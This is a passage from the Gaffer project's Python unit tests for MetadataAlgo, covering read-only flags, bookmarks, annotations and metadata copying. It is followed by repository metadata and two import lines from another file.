self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( b, True )
self.assertEqual( Gaffer.MetadataAlgo.getChildNodesAreReadOnly( b ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( p1 ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( b, False )
self.assertEqual( Gaffer.MetadataAlgo.getChildNodesAreReadOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( p1 ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
def testBookmarks( self ) :
b = Gaffer.Box()
b["n0"] = GafferTest.AddNode()
b["n1"] = GafferTest.AddNode()
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [] )
Gaffer.MetadataAlgo.setBookmarked( b["n0"], True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [ b["n0"] ] )
Gaffer.MetadataAlgo.setBookmarked( b["n1"], True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [ b["n0"], b["n1"] ] )
Gaffer.MetadataAlgo.setBookmarked( b["n0"], False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [ b["n1"] ] )
Gaffer.MetadataAlgo.setBookmarked( b, True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), True )
self.assertTrue( b not in Gaffer.MetadataAlgo.bookmarks( b ) )
s = Gaffer.ScriptNode()
s.addChild( b )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), True )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( s ), [ b ] )
def testAffected( self ) :
n = GafferTest.CompoundPlugNode()
affected = []
ancestorAffected = []
childAffected = []
def plugValueChanged( nodeTypeId, plugPath, key, plug ) :
affected.append( Gaffer.MetadataAlgo.affectedByChange( n["p"]["s"], nodeTypeId, plugPath, plug ) )
ancestorAffected.append( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], nodeTypeId, plugPath, plug ) )
childAffected.append( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], nodeTypeId, plugPath, plug ) )
c = Gaffer.Metadata.plugValueChangedSignal().connect( plugValueChanged, scoped = True )
Gaffer.Metadata.registerValue( Gaffer.Node, "user", "test", 1 )
self.assertEqual( affected, [ False ] )
self.assertEqual( ancestorAffected, [ False ] )
self.assertEqual( childAffected, [ False ] )
Gaffer.Metadata.registerValue( GafferTest.StringInOutNode, "p.s", "test", 1 )
self.assertEqual( affected, [ False, False ] )
self.assertEqual( ancestorAffected, [ False, False ] )
self.assertEqual( childAffected, [ False, False ] )
Gaffer.Metadata.registerValue( GafferTest.CompoundPlugNode, "p.s", "test", 1 )
self.assertEqual( affected, [ False, False, True ] )
self.assertEqual( ancestorAffected, [ False, False, False ] )
self.assertEqual( childAffected, [ False, False, True ] )
Gaffer.Metadata.registerValue( GafferTest.CompoundPlugNode, "p", "test", 2 )
self.assertEqual( affected, [ False, False, True, False ] )
self.assertEqual( ancestorAffected, [ False, False, False, True ] )
self.assertEqual( childAffected, [ False, False, True, False ] )
del affected[:]
del ancestorAffected[:]
del childAffected[:]
Gaffer.Metadata.registerValue( n["user"], "test", 3 )
self.assertEqual( affected, [ False ] )
self.assertEqual( ancestorAffected, [ False ] )
self.assertEqual( childAffected, [ False ] )
Gaffer.Metadata.registerValue( n["p"]["s"], "test", 4 )
self.assertEqual( affected, [ False, True ] )
self.assertEqual( ancestorAffected, [ False, False ] )
self.assertEqual( childAffected, [ False, True ] )
Gaffer.Metadata.registerValue( n["p"], "test", 5 )
self.assertEqual( affected, [ False, True, False ] )
self.assertEqual( ancestorAffected, [ False, False, True ] )
self.assertEqual( childAffected, [ False, True, False ] )
def testNodeAffected( self ) :
n = Gaffer.Box()
n["c"] = Gaffer.Node()
affected = []
childAffected = []
def nodeValueChanged( nodeTypeId, key, node ) :
affected.append( Gaffer.MetadataAlgo.affectedByChange( n, nodeTypeId, node ) )
childAffected.append( Gaffer.MetadataAlgo.childAffectedByChange( n, nodeTypeId, node ) )
c = Gaffer.Metadata.nodeValueChangedSignal().connect( nodeValueChanged, scoped = True )
Gaffer.Metadata.registerValue( Gaffer.Node, "metadataAlgoTest", 1 )
self.assertEqual( affected, [ True ] )
self.assertEqual( childAffected, [ True ] )
Gaffer.Metadata.registerValue( GafferTest.AddNode, "metadataAlgoTest", 2 )
self.assertEqual( affected, [ True, False ] )
self.assertEqual( childAffected, [ True, False ] )
Gaffer.Metadata.registerValue( n, "metadataAlgoTest", 3 )
self.assertEqual( affected, [ True, False, True ] )
self.assertEqual( childAffected, [ True, False, False ] )
n["a"] = GafferTest.AddNode()
Gaffer.Metadata.registerValue( n["a"], "metadataAlgoTest", 4 )
self.assertEqual( affected, [ True, False, True, False ] )
self.assertEqual( childAffected, [ True, False, False, True ] )
def testAncestorNodeAffected( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = GafferTest.AddNode()
s["b2"] = Gaffer.Box()
affected = []
def nodeValueChanged( nodeTypeId, key, node ) :
a = set()
for g in ( s["b"]["n"]["op1"], s["b"]["n"], s["b"] ) :
if Gaffer.MetadataAlgo.ancestorAffectedByChange( g, nodeTypeId, node ) :
a.add( g )
affected.append( a )
c = Gaffer.Metadata.nodeValueChangedSignal().connect( nodeValueChanged, scoped = True )
Gaffer.Metadata.registerValue( s["b"]["n"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 1 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( s["b"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 2 )
self.assertEqual( affected[-1], { s["b"]["n"], s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( s, "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 3 )
self.assertEqual( affected[-1], { s["b"], s["b"]["n"], s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( Gaffer.Box, "metadataAlgoTest", "test" )
Gaffer.Metadata.registerValue( s["b"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 4 )
self.assertEqual( affected[-1], { s["b"]["n"], s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( s["b2"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 5 )
self.assertEqual( affected[-1], set() )
def testCopy( self ) :
Gaffer.Metadata.registerValue( GafferTest.AddNode, "metadataAlgoTest", "test" )
s = GafferTest.AddNode()
Gaffer.Metadata.registerValue( s, "a", "a" )
Gaffer.Metadata.registerValue( s, "a2", "a2" )
Gaffer.Metadata.registerValue( s, "b", "b" )
Gaffer.Metadata.registerValue( s, "c", "c", persistent = False )
def registeredTestValues( node ) :
# We don't know what metadata might have been registered to the node
# before we run, so here we strip out any values that we're not interested in.
return set( Gaffer.Metadata.registeredValues( t ) ).intersection(
{ "metadataAlgoTest", "a", "a2", "b", "c" }
)
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "a", "a2", "b" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t, persistentOnly = False )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "a", "a2", "b", "c" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t, exclude = "a*" )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "b" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t, exclude = "a b" )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "a2" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t )
for k in Gaffer.Metadata.registeredValues( t ) :
self.assertEqual( Gaffer.Metadata.value( t, k ), Gaffer.Metadata.value( s, k ) )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copyIf( s, t, lambda f, t, n : n.startswith( "a" ) )
self.assertEqual( registeredTestValues( t ), { "a", "a2" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copyIf( s, t, lambda f, t, n : n.startswith( "c" ) )
self.assertEqual( registeredTestValues( t ), { "c" } )
def testIsPromotable( self ) :
Gaffer.Metadata.registerValue( GafferTest.AddNode, "notPromotableTest:promotable", False )
Gaffer.Metadata.registerValue( GafferTest.AddNode, "notPromotableTest", "no")
Gaffer.Metadata.registerValue( GafferTest.AddNode, "promotableTest:promotable", True )
Gaffer.Metadata.registerValue( GafferTest.AddNode, "promotableTest", "yes" )
s = GafferTest.AddNode()
t = Gaffer.Node()
self.assertFalse( Gaffer.MetadataAlgo.isPromotable( s, t, "notPromotableTest" ) )
self.assertFalse( Gaffer.MetadataAlgo.isPromotable( s, t, "notPromotableTest:promotable" ) )
self.assertTrue( Gaffer.MetadataAlgo.isPromotable( s, t, "promotableTest") )
self.assertFalse( Gaffer.MetadataAlgo.isPromotable( s, t, "promotableTest:promotable" ) )
def testCopyColorKeepExisting( self ) :
plug1 = Gaffer.IntPlug()
plug2 = Gaffer.IntPlug()
connectionColor = imath.Color3f( 0.1 , 0.2 , 0.3 )
noodleColor = imath.Color3f( 0.4, 0.5 , 0.6 )
noodleColorExisting = imath.Color3f( 0.7, 0.8 , 0.9 )
Gaffer.Metadata.registerValue( plug1, "connectionGadget:color", connectionColor )
Gaffer.Metadata.registerValue( plug1, "nodule:color", noodleColor )
Gaffer.Metadata.registerValue( plug2, "nodule:color", noodleColorExisting )
Gaffer.MetadataAlgo.copyColors(plug1, plug2, overwrite = False )
self.assertEqual( Gaffer.Metadata.value( plug2, "connectionGadget:color" ), connectionColor )
self.assertEqual( Gaffer.Metadata.value( plug2, "nodule:color" ), noodleColorExisting )
def testCopyColorForceOverWrite( self ) :
plug1 = Gaffer.IntPlug()
plug2 = Gaffer.IntPlug()
connectionColor = imath.Color3f( 0.1 , 0.2 , 0.3 )
noodleColor = imath.Color3f( 0.4, 0.5 , 0.6 )
noodleColorExisting = imath.Color3f( 0.7, 0.8 , 0.9 )
Gaffer.Metadata.registerValue( plug1, "connectionGadget:color", connectionColor )
Gaffer.Metadata.registerValue( plug1, "nodule:color", noodleColor )
Gaffer.Metadata.registerValue( plug2, "nodule:color", noodleColorExisting )
Gaffer.MetadataAlgo.copyColors(plug1, plug2, overwrite = True )
self.assertEqual( Gaffer.Metadata.value( plug2, "connectionGadget:color" ), connectionColor )
self.assertEqual( Gaffer.Metadata.value( plug2, "nodule:color" ), noodleColor )
def testReadOnlyAffectedByChange( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = GafferTest.AddNode()
s["b2"] = Gaffer.Box()
affected = []
def nodeValueChanged( nodeTypeId, key, node ) :
a = set()
for g in ( s["b"]["n"]["op1"], s["b"]["n"], s["b"] ) :
if Gaffer.MetadataAlgo.readOnlyAffectedByChange( g, nodeTypeId, key, node ) :
a.add( g )
affected.append( a )
c1 = Gaffer.Metadata.nodeValueChangedSignal().connect( nodeValueChanged, scoped = True )
def plugValueChanged( nodeTypeId, plugPath, key, plug ) :
a = set()
for g in ( s["b"]["n"]["op1"], s["b"]["n"], s["b"] ) :
if Gaffer.MetadataAlgo.readOnlyAffectedByChange( g, nodeTypeId, plugPath, key, plug ) :
a.add( g )
affected.append( a )
c2 = Gaffer.Metadata.plugValueChangedSignal().connect( plugValueChanged, scoped = True )
Gaffer.Metadata.registerValue( s["b"]["n"]["op1"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 1 )
self.assertEqual( affected[-1], set() )
Gaffer.MetadataAlgo.setReadOnly( s["b"]["n"]["op1"], True )
self.assertEqual( len( affected ), 2 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"] } )
Gaffer.MetadataAlgo.setReadOnly( s["b"]["n"], True )
self.assertEqual( len( affected ), 3 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"], s["b"]["n"] } )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b"], True )
self.assertEqual( len( affected ), 4 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"], s["b"]["n"] } )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b2"], True )
self.assertEqual( len( affected ), 5 )
self.assertEqual( affected[-1], set() )
def testUnbookmarkedNodesDontHaveMetadata( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
self.assertEqual( len( Gaffer.Metadata.registeredValues( s["n"], instanceOnly = True ) ), 0 )
Gaffer.MetadataAlgo.setBookmarked( s["n"], True )
self.assertEqual( len( Gaffer.Metadata.registeredValues( s["n"], instanceOnly = True ) ), 1 )
Gaffer.MetadataAlgo.setBookmarked( s["n"], False )
self.assertEqual( len( Gaffer.Metadata.registeredValues( s["n"], instanceOnly = True ) ), 0 )
def testNumericBookmarks( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n1"] ), 1 )
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["n2"] ) # moving the bookmark
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n1"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["n2"] )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n2"] ), 1 )
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, None )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n2"] ), 0 )
def testNumericBookmarksSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["n1"] )
Gaffer.MetadataAlgo.setNumericBookmark( s, 2, s["n2"] )
# Copying within script doesn't copy numeric bookmarks
s.execute( s.serialise() )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 2 ), s["n2"] )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n3"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n4"] ), 0 )
del s["n3"]
del s["n4"]
# Copying to new script preserves numeric bookmarks
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s2, 1 ), s2["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s2, 2 ), s2["n2"] )
def testNumericBookmarksInReferences( self ) :
# Numeric bookmarks are removed when loading References.
s = Gaffer.ScriptNode()
s["box"] = Gaffer.Box()
s["box"]["n"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["box"]["n"] )
s["box"].exportForReference( self.temporaryDirectory() + "/bookmarked.grf" )
# Bring reference back in
s["r"] = Gaffer.Reference()
s["r"].load( self.temporaryDirectory() + "/bookmarked.grf" )
# Clashing Metadata was completely removed
self.assertEqual( Gaffer.Metadata.value( s["r"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["r"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["box"]["n"] )
# Even without the clash, the metadata is removed
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, None )
s["r2"] = Gaffer.Reference()
s["r2"].load( self.temporaryDirectory() + "/bookmarked.grf" )
self.assertEqual( Gaffer.Metadata.value( s["r2"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["r2"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), None )
def testNumericBookmarksInReadOnlyBox( self ) :
# Numeric bookmarks are removed when loading read-only boxes.
s = Gaffer.ScriptNode()
s["box"] = Gaffer.Box()
s["box"]["n"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["box"]["n"] )
s["box"].exportForReference( self.temporaryDirectory() + "/bookmarked.grf" )
# Bring the box back in, not as a Reference, but as read-only Box
s["b1"] = Gaffer.Box()
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b1"], True )
s.executeFile( self.temporaryDirectory() + "/bookmarked.grf", parent = s["b1"], continueOnError = True)
# Clashing Metadata was completely removed
self.assertEqual( Gaffer.Metadata.value( s["b1"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["b1"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["box"]["n"] )
# Even without the clash, the metadata is removed
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, None )
s["b2"] = Gaffer.Box()
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b2"], True )
s.executeFile( self.temporaryDirectory() + "/bookmarked.grf", parent = s["b2"], continueOnError = True)
self.assertEqual( Gaffer.Metadata.value( s["b2"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["b2"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), None )
# But loading it without the read-only flag results in the bookmark being set
s["b3"] = Gaffer.Box()
s.executeFile( self.temporaryDirectory() + "/bookmarked.grf", parent = s["b3"], continueOnError = True)
self.assertEqual( Gaffer.Metadata.value( s["b3"]["n"], "numericBookmark1" ), True )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["b3"]["n"] ), 1 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["b3"]["n"] )
def testNumericBookmarkAffectedByChange( self ) :
# The naming convention for valid numeric bookmarks is "numericBookmark<1-9>"
for i in range( 1, 10 ) :
self.assertTrue( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark%s" % i ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark0" ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark-1" ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark10" ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "foo" ) )
def testAffectedByPlugTypeRegistration( self ) :
n = GafferTest.CompoundPlugNode()
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["s"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.affectedByChange( n["p"]["s"], Gaffer.IntPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"], Gaffer.Plug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.FloatPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.IntPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.childAffectedByChange( n["p"]["s"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"], Gaffer.CompoundPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], Gaffer.CompoundPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], Gaffer.Plug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
def testAffectedByPlugRelativeMetadata( self ) :
n = GafferTest.CompoundNumericNode()
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "*", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "[xyz]", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "...", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "x.c", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "c", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.V3fPlug, changedPlugPath = "[xyz]", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.V3fPlug, changedPlugPath = "x.c", changedPlug = None ) )
def testAnnotations( self ) :
n = Gaffer.Node()
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [] )
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotation( n, "test" ) )
cs = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal( n ) )
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( "Hello world", imath.Color3f( 1, 0, 0 ) ) )
self.assertTrue( len( cs ) )
for x in cs :
self.assertTrue( Gaffer.MetadataAlgo.annotationsAffectedByChange( x[1] ) )
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [ "test" ] )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( "Hello world", imath.Color3f( 1, 0, 0 ) )
)
del cs[:]
Gaffer.MetadataAlgo.addAnnotation( n, "test2", Gaffer.MetadataAlgo.Annotation( "abc", imath.Color3f( 0, 1, 0 ) ) )
self.assertTrue( len( cs ) )
for x in cs :
self.assertTrue( Gaffer.MetadataAlgo.annotationsAffectedByChange( x[1] ) )
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [ "test", "test2" ] )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test2" ),
Gaffer.MetadataAlgo.Annotation( "abc", imath.Color3f( 0, 1, 0 ) )
)
del cs[:]
Gaffer.MetadataAlgo.removeAnnotation( n, "test" )
self.assertTrue( len( cs ) )
for x in cs :
self.assertTrue( Gaffer.MetadataAlgo.annotationsAffectedByChange( x[1] ) )
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [ "test2" ] )
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotation( n, "test" ) )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test2" ),
Gaffer.MetadataAlgo.Annotation( "abc", imath.Color3f( 0, 1, 0 ) )
)
def testAnnotationWithoutColor( self ) :
n = Gaffer.Node()
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( text = "abc" ) )
self.assertEqual( len( Gaffer.Metadata.registeredValues( n, instanceOnly = True ) ), 1 )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( text = "abc" )
)
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( text = "xyz", color = imath.Color3f( 1 ) ) )
self.assertEqual( len( Gaffer.Metadata.registeredValues( n, instanceOnly = True ) ), 2 )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( text = "xyz", color = imath.Color3f( 1 ) )
)
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( text = "abc" ) )
self.assertEqual( len( Gaffer.Metadata.registeredValues( n, instanceOnly = True ) ), 1 )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( text = "abc" )
)
def testAnnotationToBool( self ) :
self.assertFalse( Gaffer.MetadataAlgo.Annotation() )
self.assertTrue( Gaffer.MetadataAlgo.Annotation( "test" ) )
def testAnnotationTemplates( self ) :
defaultTemplates = Gaffer.MetadataAlgo.annotationTemplates()
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotationTemplate( "test" ) )
a = Gaffer.MetadataAlgo.Annotation( "", imath.Color3f( 1, 0, 0 ) )
Gaffer.MetadataAlgo.addAnnotationTemplate( "test", a )
self.assertEqual( Gaffer.MetadataAlgo.getAnnotationTemplate( "test" ), a )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates + [ "test" ] )
n = Gaffer.Node()
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( "hi" ) )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( "hi" ),
)
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test", inheritTemplate = True ),
Gaffer.MetadataAlgo.Annotation( "hi", imath.Color3f( 1, 0, 0 ) ),
)
Gaffer.MetadataAlgo.removeAnnotationTemplate( "test" )
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotationTemplate( "test" ) )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( "hi" ),
)
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test", inheritTemplate = True ),
Gaffer.MetadataAlgo.Annotation( "hi" ),
)
def testNonUserAnnotationTemplates( self ) :
defaultTemplates = Gaffer.MetadataAlgo.annotationTemplates()
userOnlyDefaultTemplates = Gaffer.MetadataAlgo.annotationTemplates( userOnly = True )
a = Gaffer.MetadataAlgo.Annotation( "", imath.Color3f( 1, 0, 0 ) )
Gaffer.MetadataAlgo.addAnnotationTemplate( "test", a, user = False )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates + [ "test" ] )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates( userOnly = True ), userOnlyDefaultTemplates )
Gaffer.MetadataAlgo.addAnnotationTemplate( "test2", a, user = True )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates + [ "test", "test2" ] )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates( userOnly = True ), userOnlyDefaultTemplates + [ "test2" ] )
def tearDown( self ) :
for n in ( Gaffer.Node, Gaffer.Box, GafferTest.AddNode ) :
Gaffer.Metadata.deregisterValue( n, "metadataAlgoTest" )
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "881957d2d5c33bfdc68af52af36b4ea1",
"timestamp": "",
"source": "github",
"line_count": 756,
"max_line_length": 143,
"avg_line_length": 41.72486772486773,
"alnum_prop": 0.704349480091301,
"repo_name": "GafferHQ/gaffer",
"id": "ead9a77675e5c70bb5db07b9a3f60a839bcce5f5",
"size": "33347",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "python/GafferTest/MetadataAlgoTest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5790"
},
{
"name": "C",
"bytes": "61993"
},
{
"name": "C++",
"bytes": "9572701"
},
{
"name": "CMake",
"bytes": "85201"
},
{
"name": "GLSL",
"bytes": "6208"
},
{
"name": "Python",
"bytes": "10280178"
},
{
"name": "Ruby",
"bytes": "419"
},
{
"name": "Shell",
"bytes": "14580"
}
],
"symlink_target": ""
} |
import pytest
from mitmproxy.utils import data
